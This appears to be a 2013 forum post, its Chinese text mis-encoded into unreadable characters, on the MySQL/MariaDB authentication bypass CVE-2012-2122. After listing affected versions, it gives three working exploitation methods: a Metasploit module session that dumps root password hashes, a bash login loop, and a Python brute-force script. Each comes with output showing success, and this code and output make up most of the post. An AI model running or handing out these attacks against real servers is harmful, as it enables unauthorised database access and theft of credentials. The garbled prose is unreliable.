admin ·¢±íÓÚ 2013-2-19 08:27:18

MysqlÉí·ÝÈÏ֤©¶´¼°ÀûÓÃ(CVE-2012-2122)

µ±Á¬½ÓMariaDB/MySQLʱ£¬ÊäÈëµÄÃÜÂë»áÓëÆÚÍûµÄÕýÈ·ÃÜÂë±È½Ï£¬ÓÉÓÚ²»ÕýÈ·µÄ´¦Àí£¬»áµ¼Ö¼´±ãÊÇmemcmp()·µ»ØÒ»¸ö·ÇÁãÖµ£¬Ò²»áʹMySQLÈÏΪÁ½¸öÃÜÂëÊÇÏàͬµÄ¡£
Ò²¾ÍÊÇ˵ֻҪ֪µÀÓû§Ãû£¬²»¶Ï³¢ÊÔ¾ÍÄܹ»Ö±½ÓµÇÈëSQLÊý¾Ý¿â¡£°´ÕÕ¹«¸æ˵·¨´óÔ¼256´Î¾ÍÄܹ»ÃɶÔÒ»´Î¡£¶øÇÒ©¶´ÀûÓù¤¾ßÒѾ­³öÏÖ¡£

ÊÜÓ°ÏìµÄ²úÆ·£º
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 are
vulnerable.
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

ÍøÉÏÒѾ­³öÁËmetasploit°æ±¾µÄÏàÓ¦ÀûÓù¤¾ß£¬ÏÂÔصØÖ·https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb

ÀûÓ÷½·¨ÈçÏ£º


$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msfauxiliary(mysql_authbypass_hashdump) > set USERNAME root
msfauxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msfauxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306 Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


²âÊÔ·½·¨2£º


$ for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
mysql>


²âÊÔ·½·¨3£º


#!/usr/bin/python
import subprocess

while 1:
      subprocess.Popen("mysql -u root mysql --password=blah", shell=True).wait()


ÈçÏ£º


relik@stronghold:~# python mysql_bypass.py
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
ERROR 1045 (28000): Access denied for user ¡®root¡¯@'localhost¡¯ (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 24598
Server version: 5.1.62-0ubuntu0.11.10.1 (Ubuntu)

Copyright (c) 2000, 2011, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type ¡®help;¡¯ or ¡®\h¡¯ for help. Type ¡®\c¡¯ to clear the current input statement.

mysql>


Ò³: [1]
²é¿´ÍêÕû°æ±¾: MysqlÉí·ÝÈÏ֤©¶´¼°ÀûÓÃ(CVE-2012-2122)